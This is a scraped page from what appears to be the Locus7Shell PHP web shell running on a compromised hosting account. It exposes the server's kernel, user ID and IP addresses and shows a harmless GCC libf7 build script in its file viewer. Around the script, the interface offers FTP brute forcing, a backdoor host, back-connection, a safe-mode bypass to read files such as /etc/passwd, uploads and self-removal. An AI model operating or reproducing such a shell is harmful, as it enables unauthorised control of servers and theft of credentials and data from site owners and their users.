Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/libgcc/config/avr/libf7/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     f7renames.sh (1.65 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/env sh

# The first command argument tells us which flavour to generate for
# the rest of the command line arguments.

what=$1
shift

# The second command argument is the prefix to prepend to all functions.
# It is defined by F7_PREFIX in $2.

PRE=$1
shift

case ${what} in
    head)
        cat << EOF
/*
   Auto-generated file, do not change by hand.

   Generated by:    `basename $0`.
   Generated using: F7_PREFIX = ${PRE} from $1.
		    F7F, F7F_cst, F7F_asm from libf7-common.mk.
   Included by:	    libf7.h.
   Used by: 	    libf7.c, libf7.h, libf7-asm.sx, f7-wraps.h.
*/

#ifndef F7_RENAMES_H
#define F7_RENAMES_H

#define F7_(name)  ${PRE}##name
#define F7P	   ${PRE}
EOF
        ;;

    c)
        if [ x${PRE} != xf7_ ]; then
            echo " "
            echo "/* Renames for libf7.c, libf7.h.  */"
            echo " "
            for x in $*; do
                echo "#define f7_$x ${PRE}$x"
            done
        fi
        ;;

    cst)
        if [ x${PRE} != xf7_ ]; then
            echo " "
            echo "/* Renames for libf7.c, libf7.h.  */"
            echo " "
            for x in $*; do
                echo "#define f7_const_${x}   ${PRE}const_${x}"
                echo "#define f7_const_${x}_P ${PRE}const_${x}_P"
            done
        fi
        ;;

    asm)
        if [ x${PRE} != xf7_ ]; then
            echo " "
            echo "/* Renames for libf7-asm.sx, f7-wraps.h.  */"
            echo " "
            for x in $*; do
                echo "#define f7_${x}_asm ${PRE}${x}_asm"
            done
        fi
        ;;

    tail)
        cat << EOF

#endif /* F7_RENAMES_H */
EOF
        ;;

    *)
        exit 1
        ;;
esac

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0061 ]--